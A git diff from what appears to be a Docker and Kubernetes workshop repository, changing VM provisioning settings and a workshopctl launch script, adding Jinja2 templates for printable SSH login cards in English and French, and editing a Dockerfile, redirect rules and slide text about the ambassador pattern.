# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
cards_template: jerome.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: Letter
|
||||
@@ -21,7 +21,7 @@ paper_margin: 0.2in
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
@@ -7,7 +7,7 @@ clustersize: 3
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
cards_template: kube101.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: Letter
|
||||
@@ -23,7 +23,7 @@ paper_margin: 0.2in
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
@@ -23,7 +23,7 @@ paper_margin: 0.2in
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
compose_version: 1.22.0
|
||||
machine_version: 0.15.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
@@ -1,20 +1,15 @@
|
||||
#!/bin/sh
|
||||
set -e
|
||||
|
||||
export AWS_INSTANCE_TYPE=t3a.small
|
||||
|
||||
INFRA=infra/aws-us-west-2
|
||||
INFRA=infra/aws-eu-west-3
|
||||
|
||||
STUDENTS=2
|
||||
|
||||
PREFIX=$(date +%Y-%m-%d-%H-%M)
|
||||
|
||||
SETTINGS=admin-dmuc
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
TAG=admin-dmuc
|
||||
./workshopctl start \
|
||||
--tag $TAG \
|
||||
--infra $INFRA \
|
||||
--settings settings/$SETTINGS.yaml \
|
||||
--settings settings/$TAG.yaml \
|
||||
--count $STUDENTS
|
||||
|
||||
./workshopctl deploy $TAG
|
||||
@@ -22,45 +17,37 @@ TAG=$PREFIX-$SETTINGS
|
||||
./workshopctl kubebins $TAG
|
||||
./workshopctl cards $TAG
|
||||
|
||||
SETTINGS=admin-kubenet
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
TAG=admin-kubenet
|
||||
./workshopctl start \
|
||||
--tag $TAG \
|
||||
--infra $INFRA \
|
||||
--settings settings/$SETTINGS.yaml \
|
||||
--settings settings/$TAG.yaml \
|
||||
--count $((3*$STUDENTS))
|
||||
|
||||
./workshopctl disableaddrchecks $TAG
|
||||
./workshopctl deploy $TAG
|
||||
./workshopctl kubebins $TAG
|
||||
./workshopctl disableaddrchecks $TAG
|
||||
./workshopctl cards $TAG
|
||||
|
||||
SETTINGS=admin-kuberouter
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
TAG=admin-kuberouter
|
||||
./workshopctl start \
|
||||
--tag $TAG \
|
||||
--infra $INFRA \
|
||||
--settings settings/$SETTINGS.yaml \
|
||||
--settings settings/$TAG.yaml \
|
||||
--count $((3*$STUDENTS))
|
||||
|
||||
./workshopctl disableaddrchecks $TAG
|
||||
./workshopctl deploy $TAG
|
||||
./workshopctl kubebins $TAG
|
||||
./workshopctl disableaddrchecks $TAG
|
||||
./workshopctl cards $TAG
|
||||
|
||||
#INFRA=infra/aws-us-west-1
|
||||
|
||||
export AWS_INSTANCE_TYPE=t3a.medium
|
||||
|
||||
SETTINGS=admin-test
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
TAG=admin-test
|
||||
./workshopctl start \
|
||||
--tag $TAG \
|
||||
--infra $INFRA \
|
||||
--settings settings/$SETTINGS.yaml \
|
||||
--settings settings/$TAG.yaml \
|
||||
--count $((3*$STUDENTS))
|
||||
|
||||
./workshopctl deploy $TAG
|
||||
./workshopctl kube $TAG 1.13.5
|
||||
./workshopctl cards $TAG
|
||||
|
||||
|
||||
124
prepare-vms/templates/admin.html
Normal file
@@ -0,0 +1,124 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://FIXME.container.training" -%}
|
||||
{%- set pagesize = 9 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine virtuelle" -%}
|
||||
{%- set this_or_each = "cette" -%}
|
||||
{%- set plural = "" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "chaque" -%}
|
||||
{%- set plural = "s" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
|
||||
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 30%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.3em;
|
||||
}
|
||||
|
||||
img.enix {
|
||||
height: 4.0em;
|
||||
margin-top: 0.4em;
|
||||
}
|
||||
|
||||
img.kube {
|
||||
height: 4.2em;
|
||||
margin-top: 1.7em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Voici les informations permettant de se connecter à un
|
||||
des environnements utilisés pour cette formation.
|
||||
Vous pouvez vous connecter à {{ this_or_each }} machine
|
||||
virtuelle avec n'importe quel client SSH.
|
||||
</p>
|
||||
|
||||
<p>
|
||||
<img class="enix" src="https://enix.io/static/img/logos/logo-domain-cropped.png" />
|
||||
<table>
|
||||
<tr><td>cluster:</td></tr>
|
||||
<tr><td class="logpass">{{ clusterprefix }}</td></tr>
|
||||
<tr><td>identifiant:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>mot de passe:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
</p>
|
||||
|
||||
<p>
|
||||
Adresse{{ plural }} IP :
|
||||
<!--<img class="kube" src="{{ image_src }}" />-->
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>{{ clusterprefix }}{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>Le support de formation est à l'adresse suivante :
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
@@ -1,88 +1,29 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
|
||||
{%- set url = "http://FIXME.container.training/" -%}
|
||||
{%- set pagesize = 9 -%}
|
||||
{%- set lang = "en" -%}
|
||||
{%- set event = "training session" -%}
|
||||
{%- set backside = False -%}
|
||||
{%- set image = "kube" -%}
|
||||
{%- set clusternumber = 100 -%}
|
||||
|
||||
{%- set image_src = {
|
||||
"docker": "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png",
|
||||
"swarm": "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png",
|
||||
"kube": "https://avatars1.githubusercontent.com/u/13629408",
|
||||
"enix": "https://enix.io/static/img/logos/logo-domain-cropped.png",
|
||||
}[image] -%}
|
||||
{%- if lang == "en" and clustersize == 1 -%}
|
||||
{%- set intro -%}
|
||||
Here is the connection information to your very own
|
||||
machine for this {{ event }}.
|
||||
You can connect to this VM with any SSH client.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Your machine is:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "en" and clustersize != 1 -%}
|
||||
{%- set intro -%}
|
||||
Here is the connection information to your very own
|
||||
cluster for this {{ event }}.
|
||||
You can connect to each VM with any SSH client.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Your machines are:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "fr" and clustersize == 1 -%}
|
||||
{%- set intro -%}
|
||||
Voici les informations permettant de se connecter à votre
|
||||
machine pour cette formation.
|
||||
Vous pouvez vous connecter à cette machine virtuelle
|
||||
avec n'importe quel client SSH.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Adresse IP:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "en" and clusterprefix != "node" -%}
|
||||
{%- set intro -%}
|
||||
Here is the connection information for the
|
||||
<strong>{{ clusterprefix }}</strong> environment.
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "fr" and clustersize != 1 -%}
|
||||
{%- set intro -%}
|
||||
Voici les informations permettant de se connecter à votre
|
||||
cluster pour cette formation.
|
||||
Vous pouvez vous connecter à chaque machine virtuelle
|
||||
avec n'importe quel client SSH.
|
||||
{%- endset -%}
|
||||
{%- set listhead -%}
|
||||
Adresses IP:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "en" -%}
|
||||
{%- set slides_are_at -%}
|
||||
You can find the slides at:
|
||||
{%- endset -%}
|
||||
{%- endif -%}
|
||||
{%- if lang == "fr" -%}
|
||||
{%- set slides_are_at -%}
|
||||
Le support de formation est à l'adresse suivante :
|
||||
{%- endset -%}
|
||||
{%- set url = "http://container.training/" -%}
|
||||
{%- set pagesize = 12 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine" -%}
|
||||
{%- set this_or_each = "this" -%}
|
||||
{%- set machine_is_or_machines_are = "machine is" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "orchestration workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "each" -%}
|
||||
{%- set machine_is_or_machines_are = "machines are" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_swarm -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
|
||||
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
table {
|
||||
@@ -96,54 +37,24 @@ table {
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
{% if backside %}
|
||||
height: 31%;
|
||||
{% endif %}
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
/*
|
||||
width: 21.5%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
*/
|
||||
/**/
|
||||
width: 30%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
/**/
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
div.back {
|
||||
border: 1px dotted white;
|
||||
}
|
||||
|
||||
div.back p {
|
||||
margin: 0.5em 1em 0 1em;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.2em;
|
||||
margin-right: -0.4em;
|
||||
}
|
||||
|
||||
/*
|
||||
img.enix {
|
||||
height: 4.0em;
|
||||
margin-top: 0.4em;
|
||||
}
|
||||
|
||||
img.kube {
|
||||
height: 4.2em;
|
||||
margin-top: 1.7em;
|
||||
}
|
||||
*/
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
@@ -158,15 +69,19 @@ img.kube {
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
<p>{{ intro }}</p>
|
||||
|
||||
<p>
|
||||
Here is the connection information to your very own
|
||||
{{ cluster_or_machine }} for this {{ workshop_name }}.
|
||||
You can connect to {{ this_or_each }} VM with any SSH client.
|
||||
</p>
|
||||
<p>
|
||||
<img src="{{ image_src }}" />
|
||||
<table>
|
||||
{% if clusternumber != None %}
|
||||
<tr><td>cluster:</td></tr>
|
||||
<tr><td class="logpass">{{ clusternumber + loop.index }}</td></tr>
|
||||
{% endif %}
|
||||
<tr><td>login:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>password:</td></tr>
|
||||
@@ -175,44 +90,17 @@ img.kube {
|
||||
|
||||
</p>
|
||||
<p>
|
||||
{{ listhead }}
|
||||
Your {{ machine_is_or_machines_are }}:
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr>
|
||||
<td>{{ clusterprefix }}{{ loop.index }}:</td>
|
||||
<td>{{ node }}</td>
|
||||
</tr>
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
|
||||
<p>
|
||||
{{ slides_are_at }}
|
||||
<p>You can find the slides at:
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% if loop.index%pagesize==0 or loop.last %}
|
||||
<span class="pagebreak"></span>
|
||||
{% if backside %}
|
||||
{% for x in range(pagesize) %}
|
||||
<div class="back">
|
||||
<br/>
|
||||
<p>You got this at the workshop
|
||||
"Getting Started With Kubernetes and Container Orchestration"
|
||||
during QCON London (March 2019).</p>
|
||||
<p>If you liked that workshop,
|
||||
I can train your team or organization
|
||||
on Docker, container, and Kubernetes,
|
||||
with curriculums of 1 to 5 days.
|
||||
</p>
|
||||
<p>Interested? Contact me at:</p>
|
||||
<p>jerome.petazzoni@gmail.com</p>
|
||||
<p>Thank you!</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
{% endif %}
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
|
||||
121
prepare-vms/templates/enix.html
Normal file
@@ -0,0 +1,121 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://FIXME.container.training" -%}
|
||||
{%- set pagesize = 9 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine virtuelle" -%}
|
||||
{%- set this_or_each = "cette" -%}
|
||||
{%- set plural = "" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "chaque" -%}
|
||||
{%- set plural = "s" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
|
||||
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 30%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.3em;
|
||||
}
|
||||
|
||||
img.enix {
|
||||
height: 4.0em;
|
||||
margin-top: 0.4em;
|
||||
}
|
||||
|
||||
img.kube {
|
||||
height: 4.2em;
|
||||
margin-top: 1.7em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Voici les informations permettant de se connecter à votre
|
||||
{{ cluster_or_machine }} pour cette formation.
|
||||
Vous pouvez vous connecter à {{ this_or_each }} machine virtuelle
|
||||
avec n'importe quel client SSH.
|
||||
</p>
|
||||
<p>
|
||||
<img class="enix" src="https://enix.io/static/img/logos/logo-domain-cropped.png" />
|
||||
<table>
|
||||
<tr><td>identifiant:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>mot de passe:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Adresse{{ plural }} IP :
|
||||
<!--<img class="kube" src="{{ image_src }}" />-->
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>Le support de formation est à l'adresse suivante :
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
134
prepare-vms/templates/jerome.html
Normal file
@@ -0,0 +1,134 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://qconuk2019.container.training/" -%}
|
||||
{%- set pagesize = 9 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine" -%}
|
||||
{%- set this_or_each = "this" -%}
|
||||
{%- set machine_is_or_machines_are = "machine is" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "each" -%}
|
||||
{%- set machine_is_or_machines_are = "machines are" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1.0em;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
height: 31%;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 30%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
div.back {
|
||||
border: 1px dotted white;
|
||||
}
|
||||
|
||||
div.back p {
|
||||
margin: 0.5em 1em 0 1em;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.8em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 5em;
|
||||
float: right;
|
||||
margin-right: 1em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Here is the connection information to your very own
|
||||
{{ cluster_or_machine }} for this {{ workshop_name }}.
|
||||
You can connect to {{ this_or_each }} VM with any SSH client.
|
||||
</p>
|
||||
<p>
|
||||
<img src="{{ image_src }}" />
|
||||
<table>
|
||||
<tr><td>login:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>password:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Your {{ machine_is_or_machines_are }}:
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>You can find the slides at:
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% if loop.index%pagesize==0 or loop.last %}
|
||||
<span class="pagebreak"></span>
|
||||
{% for x in range(pagesize) %}
|
||||
<div class="back">
|
||||
<br/>
|
||||
<p>You got this at the workshop
|
||||
"Getting Started With Kubernetes and Container Orchestration"
|
||||
during QCON London (March 2019).</p>
|
||||
<p>If you liked that workshop,
|
||||
I can train your team or organization
|
||||
on Docker, container, and Kubernetes,
|
||||
with curriculums of 1 to 5 days.
|
||||
</p>
|
||||
<p>Interested? Contact me at:</p>
|
||||
<p>jerome.petazzoni@gmail.com</p>
|
||||
<p>Thank you!</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
106
prepare-vms/templates/kube101.html
Normal file
@@ -0,0 +1,106 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://container.training/" -%}
|
||||
{%- set pagesize = 12 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine" -%}
|
||||
{%- set this_or_each = "this" -%}
|
||||
{%- set machine_is_or_machines_are = "machine is" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "each" -%}
|
||||
{%- set machine_is_or_machines_are = "machines are" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 21.5%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.4em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Here is the connection information to your very own
|
||||
{{ cluster_or_machine }} for this {{ workshop_name }}.
|
||||
You can connect to {{ this_or_each }} VM with any SSH client.
|
||||
</p>
|
||||
<p>
|
||||
<img src="{{ image_src }}" />
|
||||
<table>
|
||||
<tr><td>login:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>password:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Your {{ machine_is_or_machines_are }}:
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>You can find the slides at:
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
@@ -1,4 +1,7 @@
|
||||
FROM alpine:3.9
|
||||
RUN apk add --no-cache entr py-pip git
|
||||
FROM alpine
|
||||
RUN apk update
|
||||
RUN apk add entr
|
||||
RUN apk add py-pip
|
||||
RUN apk add git
|
||||
COPY requirements.txt .
|
||||
RUN pip install -r requirements.txt
|
||||
|
||||
@@ -1,8 +1,4 @@
|
||||
# Uncomment and/or edit one of the the following lines if necessary.
|
||||
#/ /kube-halfday.yml.html 200
|
||||
#/ /kube-fullday.yml.html 200
|
||||
/ /kube-fullday.yml.html 200!
|
||||
#/ /kube-twodays.yml.html 200
|
||||
/ /k8s-201.yml.html 200!
|
||||
|
||||
# And this allows to do "git clone https://container.training".
|
||||
/info/refs service=git-upload-pack https://github.com/jpetazzo/container.training/info/refs?service=git-upload-pack
|
||||
|
||||
@@ -150,7 +150,7 @@ Different deployments will use different underlying technologies.
|
||||
* Ad-hoc deployments can use a master-less discovery protocol
|
||||
like avahi to register and discover services.
|
||||
* It is also possible to do one-shot reconfiguration of the
|
||||
ambassadors. It is slightly less dynamic but has far fewer
|
||||
ambassadors. It is slightly less dynamic but has much less
|
||||
requirements.
|
||||
* Ambassadors can be used in addition to, or instead of, overlay networks.
|
||||
|
||||
@@ -186,48 +186,22 @@ Different deployments will use different underlying technologies.
|
||||
|
||||
---
|
||||
|
||||
## Some popular service meshes
|
||||
## Section summary
|
||||
|
||||
... And related projects:
|
||||
We've learned how to:
|
||||
|
||||
* [Consul Connect](https://www.consul.io/docs/connect/index.html)
|
||||
<br/>
|
||||
Transparently secures service-to-service connections with mTLS.
|
||||
* Understand the ambassador pattern and what it is used for (service portability).
|
||||
|
||||
* [Gloo](https://gloo.solo.io/)
|
||||
